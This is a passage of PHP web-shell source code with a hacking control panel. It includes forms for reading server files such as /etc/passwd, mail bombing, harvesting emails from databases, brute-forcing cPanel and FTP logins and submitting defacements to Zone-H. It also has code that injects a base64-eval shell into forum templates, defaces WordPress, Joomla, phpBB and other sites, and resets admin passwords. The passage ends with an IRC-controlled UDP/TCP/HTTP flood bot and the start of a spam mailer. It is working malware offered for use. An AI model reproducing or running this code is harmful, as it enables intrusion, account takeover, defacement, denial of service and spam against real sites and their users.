  2386.         <input type=submit value='Generate ini.php' name='iniphpGenerate'><br/><br/>
  2387.         <input type='submit' value='Finding Config Files' name='configFinderSubmit' />
  2388.         <input type='submit' name='showUsers' value='Show Users' />
  2389.         </td></tr></table></form>
  2390.         <!-- End Of Fast Tools -->
  2391.         </td>
  2392.         <td valign='TOP'>
  2393.         <!-- SQL Reader -->
  2394.         <form method=POST><table width='100%' height='72' border='0'  id='Box'><tr>
  2395.     <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2396.     <td style='background-color:#666;padding-left:10px;'>SQL Reader</td></tr><tr><td height='45' colspan='2'>
  2397.         <input type='text' value='/etc/passwd' name='file' size='35'><br/>
  2398.         <input type='text' name='host' value='127.0.0.1'>
  2399.         <input type='text' name='user' value='DB user'>
  2400.         <input type='text' name='pass' value='DB pass'>
  2401.         <input type=text name='db' value='DB name'>
  2402.         <input type='submit' name='sql2Read' value='Read'>
  2403.         ";
  2404.         if($sql_con)
  2405.         {
  2406.                 echo '<input style="width:300px;" type="text" name="filetoread">
  2407.                 <input type="submit" value="Read" name="SQLToRead">';
  2408.         }
  2409.         echo "</td></tr></table></form>
  2410.         <!-- End Of SQL Reader  -->
  2411.         </td>
  2412.         </tr>
  2413.         <tr>
  2414.         <td valign='top'>
  2415.                 <!-- Mail Storm -->
  2416.         <form method=POST><table width='100%' height='72' border='0'  id='Box'><tr>
  2417.     <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2418.     <td style='background-color:#666;padding-left:10px;'>Mail Storm </td></tr><tr><td height='45' colspan='2'>
  2419.         <textarea rows='5' cols='45' name='Comments' >Attacker Message</textarea>
  2420.         <input type='text' name='to' value='Target Email' >
  2421.         <input type='text' size='5' name='nom' value='100'>
  2422.         <input name='sendMailStorm' type='submit' value='Send Mail Storm ' >
  2423.         </td></tr></table></form>
  2424.         <!-- End Of Mail Storm -->
  2425.         </td>
  2426.         <td valign='top'>
  2427.         <!-- SQL Query -->
  2428.         <form method=POST><table width='100%' height='72' border='0'  id='Box'><tr>
  2429.     <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2430.     <td style='background-color:#666;padding-left:10px;'>SQL Query</td></tr><tr><td height='45' colspan='2'>
  2431.         <input type = 'text' name=\"QU_HOST\" value='127.0.0.1'>
  2432.         <input type = 'text' name=\"QU_USER\" value='DB User'><br/>
  2433.         <input type = 'text' name=\&quot;QU_PASS\&quot; value='DB Pass'>
  2434.         <input type=text name=\&quot;QU_DB\&quot; value='DB Name' >
  2435.         <textarea name='QU'  rows=2 cols=50>SELECT * FROM emp ;</textarea>
  2436.         <input name='MySQLQuery' type='submit'>
  2437.         </td></tr></table></form>
  2438.         <!-- SQL Query  -->
  2439.         </td>
  2440.         <td valign='top'>
  2441.         <!-- Email Extractor -->
  2442.         <form method=POST><table width='100%' height='72' border='0'  id='Box'><tr>
  2443.     <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2444.     <td style='background-color:#666;padding-left:10px;'>Email Extractor</td></tr><tr><td height='45' colspan='2'>
  2445.         <input type = 'text' name='EM_HOST' value='127.0.0.1'>
  2446.     <input type='text' name='EM_USER' value='DB user'>
  2447.         <input type ='text' name='EM_PASS' value='DB pass'>
  2448.     <input type='text' name='EM_DB' value='DB name'>
  2449.         <input type ='text' name='EM_TABLE' value='users Table'>
  2450.         <input type ='text' name='EM_COLUMN' value='emails Column'><br/>
  2451.         <input name='getEmails' type='submit' id='submit' style='font-weight: value=Extract now !'>
  2452.         <input type='submit' value='?' name='emailExtractorHelp'  alt='Email Extractor Help'/>
  2453.         </td></tr></table></form>
  2454.         <!-- End Of Email Extractor -->
  2455.         </td>
  2456.         </tr>
  2457.         <tr>
  2458.         <td valign='top'>
  2459.         <!-- Zone-H -->
  2460.         <form method=POST><table width='100%' height='72' border='0'  id='Box'><tr>
  2461.     <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2462.     <td style='background-color:#666;padding-left:10px;'>Zone-H Defacer</td></tr><tr><td height='45' colspan='2'>";
  2463.         echo '<form action="" method="post">
  2464. <input type="text" name="defacer" size="40" value="Attacker" />
  2465. <select name="hackmode">
  2466. <option >--------SELECT--------</option>
  2467. <option value="1">known vulnerability (i.e. unpatched system)</option>
  2468. <option value="2" >undisclosed (new) vulnerability</option>
  2469. <option value="3" >configuration / admin. mistake</option>
  2470. <option value="4" >brute force attack</option>
  2471. <option value="5" >social engineering</option>
  2472. <option value="6" >Web Server intrusion</option>
  2473. <option value="7" >Web Server external module intrusion</option>
  2474. <option value="8" >Mail Server intrusion</option>
  2475. <option value="9" >FTP Server intrusion</option>
  2476. <option value="10" >SSH Server intrusion</option>
  2477. <option value="11" >Telnet Server intrusion</option>
  2478. <option value="12" >RPC Server intrusion</option>
  2479. <option value="13" >Shares misconfiguration</option>
  2480. <option value="14" >Other Server intrusion</option>
  2481. <option value="15" >SQL Injection</option>
  2482. <option value="16" >URL Poisoning</option>
  2483. <option value="17" >File Inclusion</option>
  2484. <option value="18" >Other Web Application bug</option>
  2485. <option value="19" >Remote administrative panel access bruteforcing</option>
  2486. <option value="20" >Remote administrative panel access password guessing</option>
  2487. <option value="21" >Remote administrative panel access social engineering</option>
  2488. <option value="22" >Attack against administrator(password stealing/sniffing)</option>
  2489. <option value="23" >Access credentials through Man In the Middle attack</option>
  2490. <option value="24" >Remote service password guessing</option>
  2491. <option value="25" >Remote service password bruteforce</option>
  2492. <option value="26" >Rerouting after attacking the Firewall</option>
  2493. <option value="27" >Rerouting after attacking the Router</option>
  2494. <option value="28" >DNS attack through social engineering</option>
  2495. <option value="29" >DNS attack through cache poisoning</option>
  2496. <option value="30" >Not available</option>
  2497. </select>
  2498.  
  2499. <select name="reason">
  2500. <option >--------SELECT--------</option>
  2501. <option value="1" >Heh...just for fun!</option>
  2502. <option value="2" >Revenge against that website</option>
  2503. <option value="3" >Political reasons</option>
  2504. <option value="4" >As a challenge</option>
  2505. <option value="5" >I just want to be the best defacer</option>
  2506. <option value="6" >Patriotism</option>
  2507. <option value="7" >Not available</option>
  2508. </select>
  2509. <textarea name="domain" cols="44" rows="9">List Of Domains</textarea>
  2510. <input type="submit" value="Send Now !" name="SendNowToZoneH" />
  2511. </form>';
  2512.         echo "</td></tr></table></form>
  2513.         <!-- End Of Zone-H -->
  2514.         </td>
  2515.         <td valign='top'>
  2516.         <!-- Cpanel And FTP BruteForce Attacker -->
  2517.                 <form method=POST><table width='100%' height='72' border='0'  id='Box'><tr>
  2518.     <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2519.     <td style='background-color:#666;padding-left:10px;'>Cpanel And FTP BruteForce </td></tr><tr><td height='45' colspan='2'>
  2520.         <textarea rows='12' name='users' cols='23' >";
  2521.         @system('ls /var/mail');
  2522.         echo "</textarea>
  2523.         <textarea rows='12' name='passwords' cols='23' >123123\n123456\n1234567\n12345678\n123456789\n159159\n112233\n332211\n!@#$%^\n^%$#@!.\n!@#$%^&\n!@#$%^&*\n!@#$
  2524.  
  2525. %^&*(\npassword\npasswd\npasswords\npass\np@assw0rd\npass@word1
  2526.         </textarea>
  2527.         <input type='text' name='target' size='16' value='127.0.0.1' >
  2528.         <input name='cracktype' value='cpanel' checked type='radio'><sy>Cpanel (2082)</sy>
  2529.         <input name='cracktype' value='ftp' type='radio'><sy>Ftp (21)</sy>
  2530.         <input type='submit' value='   Crack it !   ' name='BruteForceCpanelAndFTP' >
  2531.         </td></tr></table></form>
  2532.         <!-- End Of Cpanel And FTP BruteForce Attacker -->
  2533.         </td>
  2534.         <td valign='top'>
  2535.         <!-- Upload Files -->
  2536.         <form enctype=\"multipart/form-data\" method=\"POST\"><table width='100%' height='72' border='0'  id='Box'><tr>
  2537.     <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2538.     <td style='background-color:#666;padding-left:10px;'>Upload Files </td></tr><tr><td height='45' colspan='2'>
  2539.         <input type=\"file\" name=\"uploadfile[]\">
  2540.         <input type=\"file\" name=\"uploadfile[]\">
  2541.         <input type=\"file\" name=\"uploadfile[]\">
  2542.         <input type=\"file\" name=\"uploadfile[]\">
  2543.         <input type=\"file\" name=\"uploadfile[]\">
  2544.         <input type=\"file\" name=\"uploadfile[]\">
  2545.         <input type=\"file\" name=\"uploadfile[]\">
  2546.         <input type=\"file\" name=\"uploadfile[]\">
  2547.         <input type=\"file\" name=\"uploadfile[]\">
  2548.         <input type=\"file\" name=\"uploadfile[]\">
  2549.         <input type=\"submit\" value=\"Upload Files\" name='UploadNow'>
  2550.         </td></tr></table></form>
  2551.         <!-- End Of Upload Files -->
  2552.         </td></tr>
  2553.         </table>
  2554.         ";
  2555.         if($_POST['changeDirectory'])
  2556.         {
  2557.                 $directory = $_POST['directory'];
  2558.                 $directory = @str_replace("\\\\"," ",$directory);
  2559.                 $directory = @str_replace(" ","\\",$directory);
  2560.                 @chdir($directory);
  2561.         }      
  2562.         if($_POST['getFile'])
  2563.         {
  2564.                 $fileUrl = $_POST['fileUrl'];
  2565.                 $getType = $_POST['getType'];
  2566.                 Exe("'".$getType.$fileUrl."'");
  2567.         }
  2568. footer();
  2569. }
  2570. # ---------------------------------------#
  2571. #            IndexChanger                #
  2572. #----------------------------------------#
  2573. if ($_GET['id']== 'scriptsHack' )
  2574. {
  2575.         echo "
  2576.         <table width='100%'>
  2577.                 <tr>
  2578.                 <td colspan='2'><textarea cols='153' rows='10'>";
  2579.                 if($_POST['UpdateIndex'] || $_POST['changeInfo'] )
  2580.                 {
  2581.                         $host = $_POST['HOST'];
  2582.                         $user = $_POST['USER'];
  2583.                         $pass = $_POST['PASS'];
  2584.                         $db   = $_POST['DB'];
  2585.                         $index = $_POST['INDEX'];
  2586.                         $prefix  = $_POST['PREFIX'];
  2587.                         if (empty($_POST['HOST']))
  2588.                         $host = '127.0.0.1';
  2589.                         $index=str_replace("\'","'",$index);
  2590.                         @mysql_connect($host,$user,$pass) or die( "[-] Unable TO Connect DATABASE ! Username Or Password Is Wrong !!");
  2591.                         @mysql_select_db($db) or die ("[-] Database Name Is Wrong !!");
  2592.                        
  2593.                         if($_POST['UpdateIndex'])
  2594.                         {      
  2595.                                 if ($_POST['ScriptType'] == 'vb')
  2596.                                 {
  2597.                                         $full_index  = "{\${eval(base64_decode(\'";
  2598.                                         $full_index .= base64_encode("echo \"$index\";");
  2599.                                         $full_index .= "\'))}}{\${exit()}}</textarea>";
  2600.                                         if($_POST['injectFAQ'])
  2601.                                         {
  2602.                                                 $injectfaq = @mysql_query("UPDATE template SET template ='".$full_index."' WHERE title ='faq'");
  2603.                                         }
  2604.                                         else
  2605.                                         {
  2606.                                                 $ok1 = mysql_query("UPDATE template SET template ='".$full_index."' WHERE title ='forumhome'");
  2607.                                                 if (!$ok1)
  2608.                                                 {
  2609.                                                         $ok2 = mysql_query("UPDATE template SET template ='".$full_index."' WHERE title ='header'");
  2610.                                                 }
  2611.                                                 elseif (!$ok2)
  2612.                                                 {
  2613.                                                         $ok3 = mysql_query("UPDATE template SET template ='".$full_index."' WHERE title ='spacer_open'");
  2614.                                                 }
  2615.                                                 elseif(!$ok3)
  2616.                                                 {
  2617.                                                         $ok4 = @mysql_query("UPDATE template SET template ='".$full_index."' WHERE title ='faq'");
  2618.                                                 }
  2619.                                         }
  2620.                                         mysql_close();
  2621.                                         if ($ok1 || $ok2 || $ok3 || $ok4 || $injectfaq )
  2622.                                         {
  2623.                                                 update();
  2624.                                         }
  2625.                                         else
  2626.                                         {
  2627.                                                 echo "Updating Has Failed !";
  2628.                                         }
  2629.                                 }
  2630.                                 else if ($_POST['ScriptType'] == 'wp')
  2631.                                 {
  2632.                                         $tableName = $prefix."posts" ;
  2633.                                         $ok1 = mysql_query("UPDATE $tableName SET post_title ='".$index."' WHERE ID > 0 ");
  2634.                                         if(!$ok1)
  2635.                                         {
  2636.                                                 $ok2 = mysql_query("UPDATE $tableName SET post_content ='".$index."' WHERE ID > 0 ");
  2637.                                         }
  2638.                                         elseif(!$ok2)
  2639.                                         {
  2640.                                                 $ok3 = mysql_query("UPDATE $tableName SET post_name ='".$index."' WHERE ID > 0 ");
  2641.                                         }
  2642.                                         mysql_close();
  2643.                                         if ($ok1 || $ok2 || $ok3)
  2644.                                         {
  2645.                                                 update();
  2646.                                         }
  2647.                                         else
  2648.                                         {
  2649.                                                 echo "Updating Has Failed !";
  2650.                                         }
  2651.                                 }
  2652.                                 else if ($_POST['ScriptType'] == 'jos')
  2653.                                 {
  2654.                                         $jos_table_name = $prefix."menu" ;
  2655.                                         $jos_table_name2 = $prefix."modules" ;
  2656.                                         $ok1 = mysql_query("UPDATE $jos_table_name SET name ='".$index."' WHERE ID > 0 ");
  2657.                                         if(!$ok1)
  2658.                                         {
  2659.                                                 $ok2 = mysql_query("UPDATE $jos_table_name2 SET title ='".$index."' WHERE ID > 0 ");
  2660.                                         }
  2661.                                         mysql_close();
  2662.                                         if ($ok1 || $ok2 || $ok3)
  2663.                                         {
  2664.                                                 update();
  2665.                                         }
  2666.                                         else
  2667.                                         {
  2668.                                                 echo "Updating Has Failed !";
  2669.                                         }
  2670.                                 }
  2671.                                 else if ($_POST['ScriptType'] == 'phpbb')
  2672.                                 {
  2673.                                         $php_table_name = $prefix."forums";
  2674.                                         $php_table_name2 = $prefix."posts";
  2675.                                         $ok1 = mysql_query("UPDATE $php_table_name SET forum_name ='.$index.' WHERE forum_id > 0 ");
  2676.                                         if(!$ok1)
  2677.                                         {
  2678.                                                 $ok2 = mysql_query("UPDATE $php_table_name2 SET post_subject ='.$index.' WHERE post_id > 0 ");
  2679.                                         }
  2680.                                         mysql_close();
  2681.                                         if ($ok1 || $ok2 || $ok3)
  2682.                                         {
  2683.                                                 update();
  2684.                                         }
  2685.                                         else
  2686.                                         {
  2687.                                                 echo "Updating Has Failed !";
  2688.                                         }
  2689.                                 }
  2690.                                 else if ($_POST['ScriptType'] == 'ipb')
  2691.                                 {
  2692.                                         $ip_table_name = $prefix."components" ;
  2693.                                         $ip_table_name2 = $prefix."forums" ;
  2694.                                         $ip_table_name3 = $prefix."posts" ;
  2695.                                         $ok1 = mysql_query("UPDATE $ip_table_name SET com_title ='".$index."' WHERE com_id > 0");
  2696.                                         if(!$ok1)
  2697.                                         {
  2698.                                                 $ok2 = mysql_query("UPDATE $ip_table_name2 SET name ='".$index."' WHERE id  > 0");
  2699.                                         }
  2700.                                         if(!$ok2)
  2701.                                         {
  2702.                                                 $ok3 = mysql_query("UPDATE $ip_table_name3 SET post  ='".$IP_INDEX."' WHERE pid <10")  or die("Can't Update Templates
  2703.  
  2704. !!");
  2705.                                         }
  2706.                                         mysql_close();
  2707.                                         if ($ok1 || $ok2 || $ok3)
  2708.                                         {
  2709.                                                 update();
  2710.                                         }
  2711.                                         else
  2712.                                         {
  2713.                                                 echo "Updating Has Failed !";
  2714.                                         }
  2715.                                 }
  2716.                                 else if ($_POST['ScriptType'] == 'smf')
  2717.                                 {
  2718.                                         $table_name = $prefix."boards" ;
  2719.                                         {
  2720.                                                 $ok1 = mysql_query("UPDATE $table_name SET description ='.$index.' WHERE ID_BOARD > 0");
  2721.                                         }
  2722.                                         if(!$ok1)
  2723.                                         {
  2724.                                                 $ok2 = mysql_query("UPDATE $table_name SET name ='.$index.' WHERE ID_BOARD > 0");
  2725.                                         }
  2726.                                         mysql_close();
  2727.                                         if ($ok1 || $ok2)
  2728.                                         {
  2729.                                                 update();
  2730.                                         }
  2731.                                         else
  2732.                                         {
  2733.                                                 echo "Updating Has Failed !";
  2734.                                         }
  2735.                                 }
  2736.                                 else if ($_POST['ScriptType'] == 'mybb')
  2737.                                 {
  2738.                                         $mybb_prefix = $prefix."templates";
  2739.                                         $ok1 = mysql_query(" update $mybb_prefix set template='".$index."' where title='index' ");
  2740.                                         if ($ok1)
  2741.                                         {
  2742.                                                 update();
  2743.                                         }
  2744.                                         else
  2745.                                         {
  2746.                                                 echo "Updating Has Failed !";
  2747.                                         }
  2748.                                         mysql_close();
  2749.                                 }
  2750.                         }
  2751.                         elseif($_POST['changeInfo'])
  2752.                         {      
  2753.                                 $adminID = $_POST['adminID'];
  2754.                                 $userName = $_POST['userName'];
  2755.                                 $password = $_POST['password'];
  2756.                                 if($_POST['ScriptType'] == 'vb')
  2757.                                 {
  2758.                                         //VB Code
  2759.                                         $password = md5($password);
  2760.                                         $tryChaningInfo = @mysql_query("UPDATE user SET username = '".$userName."' , password = '".$password."' WHERE userid = ".
  2761.  
  2762. $adminID."");
  2763.                                         if($tryChaningInfo)
  2764.                                         {update();}
  2765.                                         else {mysql_error();}
  2766.                                 }
  2767.                                 else if($_POST['ScriptType'] == 'wp')
  2768.                                         {
  2769.                                                 //WoredPress
  2770.                                                 $password = crypt($password);
  2771.                                                 $tryChaningInfo = @mysql_query("UPDATE wp_users SET user_login = '".$userName."' , user_pass = '".$password."' WHERE ID
  2772.  
  2773. = ".$adminID."");
  2774.                                                 if($tryChaningInfo)
  2775.                                                 {update();}
  2776.                                                 else {mysql_error();}
  2777.                                         }
  2778.                                         else if($_POST['ScriptType'] == 'jos')
  2779.                                         {
  2780.                                                 //Joomla
  2781.                                                 $password = crypt($password);
  2782.                                                 $tryChaningInfo = @mysql_query("UPDATE jos_users SET username ='".$userName."' , password = '".$password."' WHERE ID =
  2783.  
  2784. ".$adminID."");
  2785.                                                 if($tryChaningInfo)
  2786.                                                 {update();}
  2787.                                                 else {mysql_error();}
  2788.                                         }
  2789.                                                 else if($_POST['ScriptType'] == 'phpbb')
  2790.                                                 {
  2791.                                                         //PHPBB3
  2792.                                                         $password = md5($password);
  2793.                                                         $tryChaningInfo = @mysql_query("UPDATE phpbb_users SET username ='".$userName."' , user_password = '".
  2794.  
  2795. $password."' WHERE user_id = ".$adminID."");
  2796.                                                         if($tryChaningInfo)
  2797.                                                         {update();}
  2798.                                                         else {mysql_error();}
  2799.                                                 }
  2800.                                                         else if($_POST['ScriptType'] == 'ibf')
  2801.                                                         {
  2802.                                                                 //IPBoard
  2803.                                                                 $password = md5($password);
  2804.                                                                 $tryChaningInfo = @mysql_query("UPDATE ibf_members SET name ='".$userName."' , member_login_key = '".
  2805.  
  2806. $password."' WHERE id = ".$adminID."");
  2807.                                                                 if($tryChaningInfo)
  2808.                                                                 {update();}
  2809.                                                                 else {mysql_error();}
  2810.                                                         }
  2811.                                                                 else if($_POST['ScriptType'] == 'smf')
  2812.                                                                 {
  2813.                                                                         //SMF
  2814.                                                                         $password = md5($password);
  2815.                                                                         $tryChaningInfo = @mysql_query("UPDATE smf_members SET memberName ='".$userName."' , passwd =
  2816.  
  2817. '".$password."' WHERE ID_MEMBER = ".$adminID."");
  2818.                                                                         if($tryChaningInfo)
  2819.                                                                         {update();}
  2820.                                                                         else {mysql_error();}
  2821.                                                                 }
  2822.                                                                         else if($_POST['ScriptType'] == 'mybb')
  2823.                                                                         {
  2824.                                                                                 //MyBB
  2825.                                                                                 $password = md5($password);
  2826.                                                                                 $tryChaningInfo = @mysql_query("UPDATE mybb_users SET username ='".$userName."' ,
  2827.  
  2828. password = '".$password."' WHERE uid = ".$adminID."");
  2829.                                                                                 if($tryChaningInfo)
  2830.                                                                                 {update();}
  2831.                                                                                 else {mysql_error();}
  2832.                                                                         }
  2833.                                 }
  2834.                                 /////////////////////////
  2835.                                 }
  2836.                                 else if($_POST['Decrypt'])
  2837.                                 {
  2838.                                         DecryptConfig();
  2839.                                 }
  2840.                
  2841.                
  2842.                 echo "</textarea></td></tr>
  2843.                         <td width='50%'>
  2844.                         <form method='POST'>
  2845.                         <table width='100%' height='72' border='0'  id='Box'>
  2846.                                 <tr>
  2847.                                  <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2848.                                 <td style='background-color:#666;padding-left:10px;' >Scripts Hacking </td>
  2849.                                 </tr>
  2850.                                 <tr>
  2851.                                         <td height='45' colspan='2'>
  2852.                                                 <input type = 'text' name='HOST' value='localhost'>
  2853.                                                 <input type = 'text' name='USER' value='DB Username'>
  2854.                                                 <input type = 'text' name='PASS' value='DB Password'>
  2855.                                                 <input type=text name='DB' value='DB Name'>
  2856.                                                 <input type=text name='PREFIX' value='Prefix'>
  2857.                                                 <select name='ScriptType' >
  2858.                                                 <option value='vb'>VBulletin</option>
  2859.                                                 <option value='wp'>WordPress</option>
  2860.                                                 <option value='jos'>Joomla</option>
  2861.                                                 <option value='ipb'>IP.Board</option>
  2862.                                                 <option value='phpbb'>PHPBB</option>
  2863.                                                 <option value='mybb'>MyBB</option>
  2864.                                                 <option value='smf'>SMF</option>
  2865.                                                 </select>
  2866.                                                 <br />
  2867.                                                 <sy>Inject Shell In FAQ.php ? <input type='checkbox' name='injectFAQ'> [ VB Only ]</sy><br />
  2868.                                                 <textarea name='INDEX' rows=14 cols=64 >Put Your Index Here !</textarea>
  2869.                                                 <input type='submit' value='Hack Now !!' name='UpdateIndex' >
  2870.                                         </td>
  2871.                                 </tr>
  2872.                         </table>
  2873.                         <td width='50%' valign='top'>
  2874.                 <table width='100%' height='72' border='0'  id='Box'>
  2875.                     <tr>
  2876.                         <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2877.                         <td style='background-color:#666;padding-left:10px;'>Decrypting Configs </td>
  2878.                     </tr>
  2879.                     <tr>
  2880.                         <td height='45' colspan='2'>
  2881.                             <sy>Please Put Config In The Shell Directory With The Name [ DecryptConfig.php ]</sy>
  2882.                             <input value=Decrypt name='Decrypt' type='submit' id='Decrypt' value='Decrypt Now !!'>
  2883.                         </td>
  2884.                     </tr>
  2885.                 </table>
  2886.                 <table width='100%' height='72' border='0'  id='Box'>
  2887.                     <tr>
  2888.                         <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2889.                         <td style='background-color:#666;padding-left:10px;'>Changing Admin Info </td></tr><tr><td height='45' colspan='2'>
  2890.                           <input name='adminID' type='text' id='adminID' value='admin id ~= 1'>
  2891.                           <input name='userName' type='text' id='userName' value='username'>
  2892.                           <input name='password' type='text' id='password' value='password ( Not Encrypted !)'>
  2893.                           <input type='submit' name='changeInfo' value='Change Now !'>
  2894.                           </td>
  2895.                     </tr>
  2896.                  </table>
  2897.             </form>
  2898. </td>
  2899. </tr></table>";
  2900. footer();
  2901.  
  2902. }
  2903.  
  2904. # ---------------------------------------#
  2905. #             DDos Attacker ...          #
  2906. #----------------------------------------#
  2907. if($_POST['StartAttack'])
  2908. {
  2909.         $server=$_POST['ipToAttack'];
  2910.         $Port=$_POST['portToAttack'];
  2911.         $nick="bot-";$willekeurig;
  2912.         $willekeurig=@mt_rand(0,3);
  2913.         $nicknummer=@mt_rand(100000,999999);
  2914.         $Channel="#WauShare";
  2915.         $Channelpass="ddos";
  2916.         $msg="Farewell.";
  2917.  
  2918.         @set_time_limit(0);
  2919.         $loop = 0;
  2920.         $verbonden = 0;
  2921.         $verbinden = fsockopen($server, $Port);
  2922.         while ($read = fgets($verbinden,512))
  2923.         {
  2924.                 $read = str_replace("\n","",$read);
  2925.                 $read = str_replace("\r","",$read);
  2926.                 $read2 = explode(" ",$read);
  2927.                 if ($loop == 0)
  2928.                 {
  2929.                         fputs($verbinden,"nick $nick$nicknummer\n\n");
  2930.                         fputs($verbinden,"USER cybercrime 0 * :woopie\n\n");
  2931.                 }
  2932.                 if ($read2[0] == "PING")
  2933.                 {
  2934.                         fputs($verbinden,'PONG '.str_replace(':','',$read2[1])."\n");
  2935.                 }
  2936.                 if ($read2[1] == 251)
  2937.                 {
  2938.                         fputs($verbinden,"join $Channel $Channelpass\n");
  2939.                         $verbonden++;
  2940.                 }
  2941.                 if (eregi("bot-op",$read))
  2942.                 {
  2943.                         fputs($verbinden,"mode $Channel +o $read2[4]\n");
  2944.                 }
  2945.                 if (eregi("bot-deop",$read))
  2946.                 {
  2947.                         fputs($verbinden,"mode $Channel -o $read2[4]\n");
  2948.                 }
  2949.                
  2950.                 if (eregi("bot-quit",$read))
  2951.                 {
  2952.                         fputs($verbinden,"quit :$msg\n\n");
  2953.                         break;
  2954.                 }
  2955.                 if (eregi("bot-join",$read))
  2956.                 {
  2957.                         fputs($verbinden,"join $read2[4]\n");
  2958.                 }
  2959.                 if (eregi("bot-part",$read))
  2960.                 {
  2961.                         fputs($verbinden,"part $read2[4]\n");
  2962.                 }
  2963.                 if (eregi("ddos-udp",$read))
  2964.                 {
  2965.                         fputs($verbinden,"privmsg $Channel :ddos-udp - started udp flood - $read2[4]\n\n");
  2966.                         $fp = fsockopen("udp://$read2[4]", 500, $errno, $errstr, 30);
  2967.                         if (!$fp)
  2968.                         {
  2969.                                 exit;
  2970.                         }
  2971.                         else
  2972.                         {
  2973.                                 $char = "a";
  2974.                                 for($a = 0; $a < 9999999999999; $a++)
  2975.                                 $data = $data.$char;
  2976.                                 if(fputs ($fp, $data) )
  2977.                                  {
  2978.                                         fputs($verbinden,"privmsg $Channel :udp-ddos - packets sended.\n\n");
  2979.                                  }
  2980.                                  else
  2981.                                  {
  2982.                                         fputs($verbinden,"privmsg $Channel :udp-ddos - <error> sending packets.\n\n");
  2983.                                  }
  2984.                         }
  2985.                 }
  2986.                 if (eregi("ddos-tcp",$read))
  2987.                 {
  2988.                         fputs($verbinden,"part $read2[4]\n");
  2989.                         fputs($verbinden,"privmsg $Channel :tcp-ddos - flood $read2[4]:$read2[5] with $read2[6] sockets.\n\n");
  2990.                         $server = $read2[4];
  2991.                         $Port = $read2[5];
  2992.                         for($sockets = 0; $sockets < $read2[6]; $sockets++)
  2993.                         {
  2994.                                 $verbinden = fsockopen($server, $Port);
  2995.                         }
  2996.                 }
  2997.                 if (eregi("ddos-http",$read))
  2998.                 {
  2999.                         fputs($verbinden,"part $read2[4]\n");
  3000.                         fputs($verbinden,"privmsg $Channel :ddos-http - http://$read2[4]:$read2[5] $read2[6] times\n\n");
  3001.                         $Webserver = $read2[4];
  3002.                         $Port = $read2[5];
  3003.                        
  3004.                         $Aanvraag = "GET / HTTP/1.1\r\n";
  3005.                         $Aanvraag .= "Accept: */*\r\n";
  3006.                         $Aanvraag .= "Accept-Language: nl\r\n";
  3007.                         $Aanvraag .= "Accept-Encoding: gzip, deflate\r\n";
  3008.                         $Aanvraag .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n";
  3009.                         $Aanvraag .= "Host: $read2[4]\r\n";
  3010.                         $Aanvraag .= "Connection: Keep-Alive\r\n\r\n";
  3011.                        
  3012.                         for($Aantal = 0; $Aantal < $read2[6]; $Aantal++)
  3013.                         {
  3014.                                 $DoS = fsockopen($Webserver, $Port);
  3015.                                 fwrite($DoS, $Aanvraag);
  3016.                                 fclose($DoS);
  3017.                         }
  3018.                 }
  3019.         $loop++;
  3020.         }
  3021. }
  3022. # ---------------------------------------#
  3023. #              InBoX Mailer              #
  3024. #----------------------------------------#
  3025. if ($_GET['id']== 'spamming' )
  3026. {
  3027.         $secure = "";
  3028.         error_reporting(0);
  3029.         @$action=$_POST['action'];
  3030.         @$from=$_POST['from'];
  3031.         @$realname=$_POST['realname'];
  3032.         @$replyto=$_POST['replyto'];
  3033.         @$subject=$_POST['subject'];
  3034.         @$message=$_POST['message'];
  3035.         @$emaillist=$_POST['emaillist'];
  3036.         @$lod=$_SERVER['HTTP_REFERER'];
  3037.         @$file_name=$_FILES['file']['name'];
  3038.         @$contenttype=$_POST['contenttype'];
  3039.         @$file=$_FILES['file']['tmp_name'];
  3040.         @$amount=$_POST['amount'];
  3041.         @set_time_limit(intval($_POST['timelimit']));
  3042.  
  3043.         if ($action=="send")
  3044.         {
  3045.                 $message = urlencode($message);
  3046.                 $message = ereg_replace("%5C%22", "%22", $message);
  3047.                 $message = urldecode($message);
  3048.                 $message = stripslashes($message);
  3049.                 $subject = stripslashes($subject);
  3050.         }
  3051.         echo "<table width='100%' height='72' border='0'  id='Box'>
  3052. <tr>
  3053. <td width='14' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  3054. <td width='98%' style='background-color:#666;padding-left:10px;' >Inbox Mailer</td>
  3055. </tr>
  3056. <tr>
  3057. <td height='45' colspan='2'>
  3058. <table bgcolor=#cccccc width=\"100%\"><tbody><tr><td align=\"right\" width=100><p dir=ltr>
  3059. <b><font color=#990000  size=-2><p align=left><center><form name=\"form1\" method=\"post\" action=\"\" enctype=\"multipart/form-data\"><br/>
  3060. <table width=142 border=0>
  3061. <tr>
  3062. <td width=81>
  3063. <div align=right>
  3064. <sy>Your Email:</sy></div></td>
  3065. <td width=219><sy>
  3066. <input type=text name=\"from\" value=".$from."></sy></td><td width=212>
  3067. <div align=right>
  3068. <sy>Your Name:</sy></div></td><td width=278>
  3069. <sy>
  3070. <input type=text name=\realname\" value=".$realname."></sy></td></tr><tr><td width=81>
  3071. <div align=\"right\">
  3072. <sy>Reply-To:</sy></div></td><td width=219>
  3073. <sy>
  3074. <input type=\"text\" name=\"replyto\" value=".$replyto.">
  3075. </sy></td><td width=212>
  3076. <div align=\"right\">
  3077. <sy>Attach File:</sy></div></td><td width=278>
  3078. <sy>
  3079. <input type=\"file\" name=\"file\" size=24 />
  3080. </sy> </td></tr><tr><td width=81>
  3081. <div align=\"right\">
  3082. <sy>Subject:</sy></div></td>
  3083. <td colspan=3 width=703>
  3084. <sy>
  3085. <input type=\"text\" name=\"subject\" value=".$subject." ></sy></td> </tr><tr valign=\"top\"><td colspan=3 width=520>
  3086. <sy>Message Box :</sy></td>
  3087. <td width=278>
  3088. <sy>Email Target / Email Send To :</sy></td></tr><tr valign=\"top\"><td colspan=3 width=520><sy>
  3089. <textarea name=\"message\" cols=56 rows=10>".$message."</textarea><br />
  3090. <input type=\"radio\" name=\"contenttype\" value=\"plain\" /> Plain
